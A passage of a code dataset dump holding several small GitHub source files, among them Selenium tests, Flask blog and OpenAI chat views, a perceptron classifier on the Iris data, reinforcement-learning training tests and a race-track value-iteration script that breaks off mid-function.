for i in images]\r\n text_names = [i.text for i in names]\r\n text_ages = [i.text.split(', ')[1] for i in descriptions]\r\n\r\n assert len(src_images) == len(text_names)\r\n assert len(src_images) == len(text_ages)\r\n\r\n\r\n# неявные ожидания, проверка таблицы питомцев\r\n\r\ndef test_implicitly_wait(test_driver):\r\n test_driver.implicitly_wait(5)\r\n\r\n test_driver.get(f'{base_url}my_pets')\r\n\r\n images = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/th[1]')\r\n names = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/td[2]')\r\n ages = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/td[3]')\r\n\r\n src_images = [i.get_attribute('src') for i in images]\r\n text_names = [i.text for i in names]\r\n text_ages = [i.text for i in ages]\r\n\r\n assert len(src_images) == len(text_names)\r\n assert len(src_images) == len(text_ages)\r\n","repo_name":"dimmycore/selenium_auto_tests","sub_path":"2222.py","file_name":"2222.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35485466231","text":"import pandas as pd\nimport numpy as np\nfrom helper import showMe, getnextid\n\nclass position():\n\tclass metadata():\n\t\tdef __init__(self, id):\n\t\t\tself.id = id\n\t\t\tself.name = 'position-' + str(id)\n\t\t\tself.opendate = None\n\t\t\tself.closedate = None\n\t\t\tself.closetype = None\n\n\tdef __init__(self):\n\t\tself.metadata = self.metadata(getnextid('position'))\n\t\tself.legs = []\n","repo_name":"breath2live/genZero","sub_path":"position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35472081244","text":"from flask import request, json, Response, Blueprint\nfrom .. models.skills import SkillsModel, SkillsSchema\nfrom .. shared.authentication import Auth\n\nskills_api = Blueprint('skills', __name__)\nskills_schema = SkillsSchema()\n\ndef custom_response(res, status_code):\n return Response(\n mimetype = \"application/json\",\n response = json.dumps(res),\n status=status_code\n )\n\n# READ - Gets all skills\n@skills_api.route('/', methods=['GET'])\ndef skills_get_all():\n skills = SkillsModel.get_all_skills()\n ser_data, error = skills_schema.dump(skills, many=True)\n print(type(ser_data))\n print(ser_data)\n return custom_response(ser_data, 200)\n\n# READ - Get 1 skill\n@skills_api.route('/', methods=['GET'])\ndef skills_get_by_id(id):\n post = SkillsModel.get_one_skill(id)\n if not post:\n return custom_response({'error': 'Skill not found'}, 404)\n data, error = skills_schema.dump(post)\n return custom_response(data, 200)\n\n# CREATE - Post new skill to db\n@skills_api.route('/', methods=['POST'])\ndef skills_create():\n\n req_data = request.get_json()\n print(f'req_data = {req_data}')\n\n data, error = skills_schema.load(req_data)\n print(f'data = {data}')\n\n skills = SkillsModel(data)\n skills.save()\n\n ser_data, error = skills_schema.dump(skills)\n print(f'ser_data = {ser_data}')\n return custom_response(ser_data, 201)\n\n# UPDATE - Update an existing skill\n@skills_api.route('/', methods=['PUT'])\ndef skills_update(id):\n req_data = request.get_json()\n skill = SkillsModel.get_one_skill(id)\n\n if not skill:\n return custom_response({'error': 'Skill not found'}, 404)\n\n data, error = skills_schema.dump(skill)\n\n # if data.get('owner_id') != g.user.get('id'):\n # return custom_response({'error': 'Permission Denied'}, 400)\n\n data, error = skills_schema.load(req_data, partial=True)\n\n skill.update(data)\n data, error = skills_schema.dump(skill)\n return custom_response(data, 200)\n\n\n# Delete - Delete skill from User\n@skills_api.route('', methods=['DELETE'])\ndef delete(id):\n post = SkillsModel.get_one_skill(id)\n\n if not post:\n return custom_response({'error': 'Skill not found'}, 404)\n\n data, error = skills_schema.dump(post)\n # if data.get('owner_id') != g.user.get('id'):\n # return custom_response({'error': 'Permission Denied'}, 400)\n\n post.delete()\n return custom_response({'message': 'Deleted'}, 204)\n","repo_name":"cjon2019/CJON_Flask","sub_path":"src/views/skills_view.py","file_name":"skills_view.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575879787","text":"#########################################################\n### Q1-1 : Iris Classification using Perceptron Class ###\n#########################################################\nimport numpy as np\n\n### Perceptron Class 생성 ###\nclass Perceptron(object):\n\n\t# Perceptron 생성/초기화 함수\n\tdef __init__(self, eta=0.01, n_iter=50, random_state=1):\n\t\t'''\n\t\teta : Learning rate\n\t\tn_iter : Number of Iteration for classification in single NN layer\n\t\trandom_state : Number of perceptrons/neurons used in single NN layer\n\t\t'''\n\t\tself.eta = eta # Learning Rate 선언\n\t\tself.n_iter = n_iter # Regression 반복 횟수 선언\n\t\tself.random_state = random_state # 단일 Perceptron/Neuron에 입력될 Weight를 최초에 몇 개를 랜덤하게 초기화할지 선언 (Seed 선언)\n\n\t# Perceptron의 Regression 함수\n\tdef fit(self, X, y):\n\t\t'''\n\t\tX : Perceptron 입력 데이터 ('데이터셋의 Feature 데이터' 또는 '이전 Layer의 Perceptron에서 전달된 Output')\n\t\ty : 데이터셋의 Label/Target 데이터\n\t\t'''\n\t\trgen = np.random.RandomState(self.random_state)\n\t\t# 사용자가 지정한 개수만큼 Perceptron/Neuron의 Weight의 전체 또는 일부에 대한 초기값(Seed)을 생성하기 위한 난수 발생기\n\t\t# Reproducibility를 보장하기 위해 random_state를 설정하여 매번 동일한 형태의 난수를 발생하여 최초 Weight (Seed)를 설정하게함\n\n\t\tself.w_ = rgen.normal(loc=0.0, scale=0.01, size=1 + X.shape[1])\n\t\t# random_state 개수만큼 입력 weight의 초기값을 Normal Distribution으로 구성된 랜덤한 값으로 설정함\n\n\t\tself.errors_ = [] # 매 Regression마다 발생하는 Error값 저장\n\n\t\tfor _ in range(self.n_iter):\n\t\t\terrors = 0\n\t\t\tfor xi, target in zip(X, y):\t# 전체 데이터셋에 대해서 Regression 수행\n\t\t\t\t\n\t\t\t\t# weight 대비 Output Error/Loss의 변화량/미분값(dL/dw)에 비례하여 각 Perceptron의 Weight를 Update함\n\t\t\t\t# 이를 위해 weight 대비 Output Error/Loss의 미분값(dL/dw)을 Learning Rate만큼 곱해서 Weight를 업데이트하여 Gradient Descent를 구현함\n\t\t\t\t\n\t\t\t\t# weight 대비 Output Error/Loss (dL/dw)는 Chain Rule에 의해 \n\t\t\t\t# Loss 함수의 미분값 * Activation 함수의 미분값 * 이전 Layer의 Output (Activation을 거친 Weighted Sum)으로 구할 수 있음\n\n\t\t\t\tupdate = self.eta * (target - self.predict(xi))\t\t\n\t\t\t\t# 현재 Perceptron에서 사용하는 Activation Function이 Step Function이기 때문에 (predict 함수 참고) \n\t\t\t\t# 미분한 값이 x=0에서 1인 Impulse Function임. 그러므로 Activation Function의 미분값으로 1이 사용되어 곱해짐.\n\t\t\t\t\n\t\t\t\tself.w_[1:] += update * xi\t\n\t\t\t\t# Perceptron의 입력 Weight (이전 Neuron의 Output에 곱해져서 전달되는 비율)를 입력 데이터, Weight에 따른 Error/Loss 변화량, \n\t\t\t\t# Learning Rate를 반영하여 더하여 누적 업데이트함 (Gradient Descent에 의한 Weight 업데이트)\n\n\t\t\t\tself.w_[0] += update\n\t\t\t\t# Perceptron의 입력 Bias (이전 Neuron의 Output에 더해져서 전달되는 양)는 미분하면 0이기에 Weight에 따른 Error/Loss 변화량과 \n\t\t\t\t# Learning Rate만 반영하여 더하여 누적 업데이트함 (Gradient Descent에 의한 Bias 업데이트)\n\n\t\t\t\terrors += int(update != 0.0)\t# Error값이 0이 아닌 경우 (Output과 Prediction이 일치하지 않는 경우)에만 Error값을 누적함\n\n\n\t\t\tself.errors_.append(errors)\n\n\t\treturn self\n\n\t# Perceptron의 Weighted Sum 연산 함수\n\tdef net_input(self, X):\n\n\t\treturn np.dot(X, self.w_[1:]) + self.w_[0]\t# Matrix간 Dot Product를 통한 Weighted Sum과 Bias (0번 Weight)를 더함\n\n\t# Prediction 함수\n\tdef predict(self, X):\n\t\t\t\n\t\t# np.where를 사용하여 Step Function의 Activation Function을 구현함\n\t\t# Weighted Sum이 0보다 큰 경우 1, 작은 경우 -1로 나눌 수 있는 Step Function을 통해 Perceptron의 최종 Output의 출력함\n\t\treturn np.where(self.net_input(X) >= 0.0, 1, -1)\n\n\n### Iris 데이터셋을 이용한 Perceptron 훈련 ###\nimport pandas as pd\n\n# 데이터셋 로딩\ndf = pd.read_csv('https://archive.ics.uci.edu/ml/'\n\t\t 'machine-learning-databases/iris/iris.data', header=None)\n\n# 데이터셋 끝단 5개 출력\nprint(df.tail())\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# 데이터셋 0 ~ 3번 Column : Feature 데이터\n# 데이터셋 4번 Column : Label/Target 데이터\ny = df.iloc[0:100, 4].values\t# Dataset에서 0 ~ 99번 데이터의 Label/Target (4번 Column)만 추출\n\t\t\t\t# Dataset에서 0 ~ 99번 데이터의 Label/Target은 setosa와 versicolor로만 구성됨\n# setosa와 veriscolor에 대해서만 Classification 수행을 위해 Target에 대해 숫자 Labeling 수행\ny = np.where(y == 'Iris-setosa', -1, 1)\t# 데이터셋에서 Label이 Iris-setosa인 경우 -1로 지정\n\t\t\t\t\t# 데이터셋에서 Label이 Iris-versicolor인 경우 1로 지정\n\nX = df.iloc[0:100, [0, 2]].values\t# Dataset에서 0 ~ 99번 데이터의 0번 Column(꽃받침 길이)과 2번 Column(꽃잎 길이) 추출\n\n# Feature 데이터에 대해 Label의 분포를 확인하기 위해 Scatter 그래프 작성\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='setosa')\t\t# 0 ~ 49번 setosa Label의 꽃받침 길이와 꽃잎 길이 대비 분포 작성\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='versicolor')\t# 50 ~ 99번 setosa Label의 꽃받침 길이와 꽃잎 길이 대비 분포 작성\n\nplt.xlabel('sepal length [cm]')\nplt.ylabel('petal length [cm]')\nplt.legend(loc='upper left')\n\nplt.show()\n\n# Perceptron 준비 및 학습\n\nppn = Perceptron(eta=0.1, n_iter=10)\n# Regression Learning Rate = 0.1, 반복 횟수 = 10회로 설정된 Perceptron 선언\n\nppn.fit(X, y)\n# Iris 데이터셋의 0 ~ 99번 데이터의 0번 Column(꽃받침 길이)과 2번 Column(꽃잎 길이)를 \n# Feature로 사용하는 상황에서 Label/Target (4번 Column)을 Classification 하도록 Regression 학습 수행\n\nprint(ppn.errors_)\t# Perceptron 학습 결과의 Iteration마다 발생한 Error값 출력\n\nplt.plot(range(1, len(ppn.errors_) + 1), ppn.errors_, marker='o')\t# 매 학습 Iteration (Epoch)마다 발생한 Error값의 그래프 작성\nplt.xlabel('Epochs')\nplt.ylabel('Number of errors')\n\nplt.show()\n\n### Perceptron 훈련 결과 Decision Boundary로 표현 ###\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_boundary(X, y, classifier, resolution=0.02):\n\t# 그래프 상 각 데이터의 Label과 영역을 표시하기 위한 Marker와 Colormap 선언\n\tmarkers = ('s', 'x', 'o', '^', 'v')\n\tcolors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n\tcmap = ListedColormap(colors[:len(np.unique(y))])\t# 각 Label별로 리스트 상 순서에 따라 고유의 색이 사용되게함\n\n\t# Decision Boundary 생성\n\tx1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\t# Dataset의 0번 Column 데이터 범위\n\tx2_min, x2_max = X[:, 1].min() - 1, X[:, 0].max() + 1\t# Dataset의 1번 Column 데이터 범위\n\n\t# np.meshgrid를 사용하여 Dataset의 0번, 1번 데이터 범위로 구성된 2D Matrix 생성\n\txx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution), np.arange(x2_min, x2_max, resolution))\n\t# Dataset의 0번, 1번 데이터를 각각 Column-wise로 합쳐서 Classifier에게 전달하여 Prediction 수행함\n\t# Dataset 전 범위에 걸쳐서 Prediction을 수행함\n\tZ = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n\tZ = Z.reshape(xx1.shape)\t# Prediction 결과를 입력 데이터 형태와 동일하게 재구성함\n\n\tplt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\t\n\t# 데이터 전 범위에 대한 Prediction 결과에서 1인 경우 파란색, -1인 경우 빨간색으로 칠해서 Decision Boundary에 의한 영역분할을 나타냄\n\tplt.xlim(xx1.min(), xx1.max())\t# 그래프 X 범위 설정\n\tplt.ylim(xx2.min(), xx2.max())\t# 그래프 y 범위 설정\n\n\t# 주어진 Iris 데이터셋에 대한 Prediction 결과를 Scatter Plot으로 추가로 그려넣음\n\tfor idx, cl in enumerate(np.unique(y)):\n\t\tplt.scatter(x=X[y == cl, 0], \n\t\t\t y=X[y == cl, 1],\n\t\t\t alpha=0.8, \n\t\t\t c=colors[idx],\n\t\t\t marker=markers[idx], \n\t\t\t label=cl, \n\t\t\t edgecolor='black')\n\nplot_decision_boundary(X, y, classifier=ppn)\n# Perceptron을 이용한 Prediction 결과에 대한 Decision Boundary를 그래프로 그림\n\nplt.xlabel('sepal length [cm]')\t\t# 그래프 X축 설명\nplt.ylabel('petal length [cm]')\t\t# 그래프 y축 설명\nplt.legend(loc='upper left')\n\nplt.show()\n\n","repo_name":"luwis93choi/ML2020_Class","sub_path":"Assignment_05_Neural_Network/01_pereceptron.py","file_name":"01_pereceptron.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37226464345","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom blog.models import BlogPost\nfrom django.http import Http404\nfrom .forms import BlogPostForm, BlogPostModelForm\n# Create your views here.\n\n\n# get -> 1 object\n#filter -> set of objects\ndef blog_post_detail_page(request,slug):\n # if slugs wasn't unique:\n #queryset = BlogPost.objects.filter(slug=slug)\n #if queryset.count() == 0:\n # raise Http404\n #obj = queryset.first()\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name='detail.html'\n context={'object':obj}\n return render(request, template_name, context)\n\n\n# CRUD\n\n\ndef blog_post_list_view(request):\n queryset = BlogPost.objects.all().published() # list of python objects\n # as search: queryset = BlogPost.objects.filter(title__icontaints='something here')\n if request.user.is_authenticated:\n myqueryset = BlogPost.objects.filter(user=request.user)\n queryset = (queryset | myqueryset).distinct()\n template_name = 'blog/list.html'\n context = {'object_list':queryset}\n return render(request, template_name, context= context)\n\n#@login_required\n@staff_member_required\ndef blog_post_create_view(request):\n form = BlogPostModelForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n print(form.cleaned_data)\n # obj = BlogPost.objects.create(**form.cleaned_data)\n # we can make some changes to our model with commit = False\n obj = form.save(commit=False)\n obj.title = form.cleaned_data.get(\"title\")\n obj.user = request.user\n obj.save()\n form = BlogPostModelForm()\n return redirect(\"/blog\")\n template_name = 'blog/form.html'\n context = {'form':form}\n return render(request, template_name, context= context)\n\n@staff_member_required\ndef blog_post_detail_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name='blog/detail.html'\n context={'object':obj}\n return render(request, template_name, context)\n\n@staff_member_required\ndef blog_post_update_view(request,slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n form = BlogPostModelForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(\"/blog\")\n template_name='blog/form.html'\n context={ 'title':f\"Update {obj.title}\",'form':form}\n return render(request, template_name, context)\n\n@staff_member_required\ndef blog_post_delete_view(request,slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name='blog/delete.html'\n if request.method == \"POST\":\n obj.delete()\n return redirect(\"/blog\")\n context={'object':obj}\n return render(request, template_name, context)\n","repo_name":"NimaFathi/BlogPostWebsite","sub_path":"website/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13087945714","text":"import logging\nimport os\nimport pdb\nimport pickle\nimport time\n\nimport numpy as np\nimport scipy\nimport torch\nimport torch.functional as F\nfrom lib.dataset_utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n\ndef main():\n\n idx = 1\n TOL = 1e-5\n name = 'test_nb_pca25'\n\n # Get logger\n log_file = name + '.log'\n log = logging.getLogger(name)\n log.setLevel(logging.DEBUG)\n # Create formatter and add it to the handlers\n formatter = logging.Formatter(\n '[%(levelname)s %(asctime)s %(name)s] %(message)s')\n # Create file handler\n fh = logging.FileHandler(log_file, mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n log.addHandler(fh)\n log.info(log_file)\n\n (x_train, y_train), (_, _), (_, _) = load_mnist_all(\n data_dir='/data', val_size=0.1, shuffle=True, seed=1)\n points = x_train.view(-1, 784).numpy()\n\n # PCA\n from sklearn.decomposition import PCA\n pca = PCA(n_components=25)\n points = pca.fit_transform(points)\n\n mid = []\n nonmid = []\n nearest_point = np.copy(points[idx])\n points = np.delete(points, idx, axis=0)\n distance = np.zeros(points.shape[0]) - 1\n\n log.info('checking midpoints...')\n start = time.time()\n for i in range(points.shape[0]):\n midpoint = (nearest_point + points[i]) / 2\n dist = ((midpoint - points) ** 2).sum(1)\n min_dist = dist.min()\n min_idx = np.where(dist - min_dist < TOL)[0]\n dist_to_nearest_point = ((midpoint - nearest_point) ** 2).sum()\n if abs(dist_to_nearest_point - min_dist) < 1e-12 and i in min_idx and len(min_idx) == 1:\n mid.append(i)\n distance[i] = np.sqrt(min_dist)\n else:\n nonmid.append(i)\n if i % 1000 == 0:\n log.debug(i)\n end = time.time()\n\n log.info('runtime for checking midpoint: %.4fs', end - start)\n log.info('len of mid: %d', len(mid))\n log.info('len of non-mid: %d', len(nonmid))\n\n def get_polytope(points, nearest_point):\n A = np.zeros((points.shape[0], points.shape[1]))\n b = np.zeros(A.shape[0])\n for i in range(A.shape[0]):\n A[i] = points[i] - nearest_point\n b[i] = (A[i] @ (points[i] + nearest_point)) / 2\n return A, b\n\n A, b = get_polytope(points, nearest_point)\n A = A.astype(np.float32)\n b = b.astype(np.float32)\n assert A.shape == points.shape\n\n AAT = A @ A.T\n norm_A = np.diag(AAT)\n d = A.shape[0]\n\n num_steps = 1000\n feas = []\n\n x_hat = nearest_point\n # x_hat = np.zeros(A.shape[1]) + 1\n b_hat = A @ x_hat - b\n\n def objective(lamda):\n return - 0.5 * ((A.T @ lamda) ** 2).sum() + lamda @ b_hat\n\n def cga_update(lamda, g, idx_hp):\n gg = np.maximum(0, lamda + g / norm_A) - lamda\n gg[idx_hp] = g[idx_hp] / norm_A[idx_hp]\n gg_abs = np.abs(gg)\n i_star = gg_abs.argmax()\n lamda[i_star] += gg[i_star]\n g = g - gg[i_star] * AAT[:, i_star]\n return lamda, g, gg_abs\n\n def cga(idx_hp):\n lamda = np.zeros(d)\n g = b_hat\n for step in range(num_steps):\n lamda, g, gg = cga_update(lamda, g, idx_hp)\n if gg.max() < TOL:\n obj = objective(lamda)\n # log.info(obj)\n # log.info(step)\n return obj\n return None\n\n def run_all_hp():\n for i, idx_hp in enumerate(nonmid):\n obj = cga(idx_hp)\n if obj is not None:\n feas.append(idx_hp)\n distance[idx_hp] = np.sqrt(obj * 2)\n if i % 1000 == 0:\n log.debug(i)\n\n log.info('start solving QPs on non-midpoints...')\n start = time.time()\n run_all_hp()\n end = time.time()\n log.info('QP runtime: %.4fs', end - start)\n\n log.info('len of feas: %d', len(feas))\n log.info('number of edges: %d', (len(feas) + len(mid)))\n log.info('number of non-edges: %d', (len(points) - len(feas) - len(mid)))\n\n pickle.dump(distance, open('distance_%s.p' % name, 'wb'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wagner-group/geoadex","sub_path":"archived/test_nb.py","file_name":"test_nb.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11223899451","text":"import os\nimport logging\nfrom flask import Flask, request, render_template, jsonify\nimport openai\n\napp = Flask(__name__)\n\n# Load your OpenAI API key from the environment variables\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n# Set up logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/ask', methods=['POST'])\ndef send_question():\n # Get the question from the request data\n data = request.get_json()\n question = data.get('question', '')\n\n # Check if the question is empty\n if not question:\n return jsonify({'error': 'Question is required'}), 400\n\n # Check if the API key is set\n if not openai.api_key:\n logger.error('OpenAI API key is missing or not configured')\n return render_template('index.html', error='OpenAI API key is not configured')\n\n try:\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": question},\n ]\n )\n\n answer = response.choices[0].message['content']\n\n # Log the API call and response\n logger.info(f'API Call: question=\"{question}\", answer=\"{answer}\"')\n\n return jsonify({'answer': answer})\n\n except Exception as e:\n logger.error(f'Error: {str(e)}')\n return render_template('index.html', error=str(e)) # Pass the error message to the template\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"Manuel-Espinosa/flask-chatgpt-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32625555595","text":"# Solves the apartment hunting problem\n\n\n# O(b) time | O(b) space \ndef get_priority_memo(priority, blocks):\n htbl = dict()\n\n for i in range(len(blocks)):\n if blocks[i][priority]:\n htbl[0] = [i, 'right']\n break\n \n for i in range(1, len(blocks)):\n if blocks[i][priority]:\n htbl[i] = [0, 'self']\n \n elif i+1 < len(blocks) and blocks[i+1][priority]:\n htbl[i] = [1, 'right']\n \n elif blocks[i-1][priority]:\n htbl[i] = [1, 'left']\n \n else:\n temp = htbl[i-1]\n\n if temp[1] == \"left\":\n htbl[i] = [temp[0]+1, \"left\"]\n\n elif temp[1] == \"right\":\n htbl[i] = [temp[0]-1, \"right\"]\n \n return [htbl[i][0] for i in range(len(blocks))]\n\n# O(br) time | O(br) space\ndef apartment_hunting(blocks, priorities):\n priority_memos = [get_priority_memo(priority, blocks) for priority in priorities]\n memo = []\n\n for i in range(len(blocks)):\n memo.append(max([priority_memo[i] for priority_memo in priority_memos]))\n \n return min(enumerate(memo), key=lambda item: item[1])[0]\n\n\nif __name__ == \"__main__\":\n res = apartment_hunting(\n [\n {\n \"gym\": False,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": True,\n \"school\": False,\n \"store\": False,\n },\n {\n \"gym\": True,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": False,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": False,\n \"school\": True,\n \"store\": True,\n },\n ],\n [\"gym\",\"school\",\"store\"]\n )\n\n assert res == 3, res\n\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"Apartment Hunting/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"29622826893","text":"def validate(request):\r\n if(request.form == {}):\r\n return [\"False\",\"\"]\r\n name = request.form.get('name')\r\n if(len(name) <=8 or len(name) >=15):\r\n return [\"False\",\"name\"]\r\n mobile =request.form.get('mobile')\r\n mobile = str(mobile)\r\n if(len(mobile) != 10):\r\n return [\"False\",\"mobile\"]\r\n else:\r\n start = mobile[0]\r\n if start not in ['6','7','8','9']:\r\n return [\"False\",'mobile']\r\n return ['True']","repo_name":"sajanlawrence/TCS-Flask-Exam-Prep","sub_path":"TCS Flask Exam Prep/Flask RestFul API/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422849763","text":"import random\nimport time\n\nimport pytest\n\nfrom effective_horizon.experiments.train import ex as train_ex\nfrom effective_horizon.experiments.train_bc import ex as train_bc_ex\n\n\n@pytest.fixture\ndef random_seed():\n random.seed(time.time_ns())\n\n\n@pytest.mark.uses_rllib\ndef test_pretrain_atari_bc(random_seed, tmp_path):\n run = train_bc_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"BRIDGE/freeway_10_fs30-v0\",\n \"input\": \"data/atari_human_data/rllib_complete_minimal_actions/freeway\",\n \"num_workers\": 0,\n \"entropy_coeff\": 0.1,\n \"num_training_iters\": 10,\n \"train_batch_size\": 100,\n }\n )\n assert run.result is not None\n assert (\n run.result[\"info\"][\"learner\"][\"default_policy\"][\"learner_stats\"][\"bc_loss\"] < 1\n )\n\n\n@pytest.mark.uses_rllib\ndef test_pretrain_procgen(random_seed, tmp_path):\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"procgen\",\n \"procgen_env_name\": \"coinrun\",\n \"run\": \"PPO\",\n \"train_batch_size\": 100,\n \"rollout_fragment_length\": 100,\n \"sgd_minibatch_size\": 100,\n \"num_workers\": 1,\n \"num_sgd_iter\": 1,\n \"num_training_iters\": 1,\n \"entropy_coeff\": 0.1,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_ppo(random_seed, tmp_path):\n mdp, optimal_reward = random.choice(\n [\n (\"BRIDGE/freeway_10_fs30-v0\", 1),\n (\"BRIDGE/maze_easy_l0_30_fs1-v0\", 10),\n (\"BRIDGE/MiniGrid-KeyCorridorS3R1-v0\", 1),\n ]\n )\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": mdp,\n \"run\": \"PPO\",\n \"train_batch_size\": 100,\n \"rollout_fragment_length\": 100,\n \"sgd_minibatch_size\": 100,\n \"num_sgd_iter\": 1,\n \"num_workers\": 1,\n \"num_training_iters\": 1,\n \"stop_on_eval_reward\": optimal_reward,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_dqn(random_seed, tmp_path):\n mdp, optimal_reward = random.choice(\n [\n (\"BRIDGE/freeway_10_fs30-v0\", 1),\n (\"BRIDGE/maze_easy_l0_30_fs1-v0\", 10),\n (\"BRIDGE/MiniGrid-KeyCorridorS3R1-v0\", 1),\n ]\n )\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": mdp,\n \"run\": \"FastDQN\",\n \"train_batch_size\": 80,\n \"rollout_fragment_length\": 10,\n \"sgd_minibatch_size\": 80,\n \"num_sgd_iter\": 1,\n \"num_workers\": 1,\n \"epsilon_timesteps\": 1000,\n \"dueling\": True,\n \"double_q\": True,\n \"prioritized_replay\": True,\n \"replay_buffer_capacity\": 1000,\n \"learning_starts\": 0,\n \"simple_optimizer\": True,\n \"num_training_iters\": 1,\n \"stop_on_eval_reward\": optimal_reward,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_gorp(random_seed, tmp_path):\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"atari\",\n \"horizon\": 27000,\n \"frameskip\": 4,\n \"deterministic\": True,\n \"rom_file\": \"pong\",\n \"reward_scale\": 1,\n \"done_on_life_lost\": True,\n \"gamma\": 0.99,\n \"run\": \"GORP\",\n \"episodes_per_action_seq\": 1,\n \"num_training_iters\": 2,\n \"stop_on_timesteps\": 1000,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= -21\n","repo_name":"cassidylaidlaw/effective-horizon","sub_path":"tests/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"12393992964","text":"import logging\nimport sys\nimport os\nimport random\nimport time\nimport copy\nimport numpy as np\nfrom random import random\nfrom statistics import mean\n\nfrom data_utils.race_track import RaceTrack, RaceCar, Action, State\n\n# Logging stuff\nlog_level = logging.INFO\nLOG = logging.getLogger(__name__)\nLOG.setLevel(log_level)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nLOG.addHandler(handler)\n\nNUM_RACES = 10\n\n# Class that manages the Value Iteration dynamic programming algorithm for filling out the V values of a RaceCar and\n# setting acceleration policy.\nclass RaceTrackValueIteration(object):\n\n # Algorithm needs a RaceTrack, A RaceCar, the learning_rate, the maximum allowed iterations through the state space\n # an a boolean to set the crash policy. If True, a crash sets the RaceCar to the start, if False, a crash places\n # a racecar at it's last non-wall position with zero velocity.\n def __init__(self, race_track: RaceTrack, race_car: RaceCar, learning_rate: float, max_iterations: int,\n crash_means_restart: bool\n ):\n self.rt = race_track\n self.rc = race_car\n self.lr = learning_rate\n self.mi = max_iterations\n self.crash_means_restart = crash_means_restart\n\n # Used to calculate the reward of taking an action at a state. For this model, all actions taken at non finish line\n # spaces have a cost of -1 and all finish line spaces have a cost of 0 making them an absorbing state.\n def reward(self, x, y):\n if self.rt.track_matrix[y][x] == \"F\":\n return 0\n 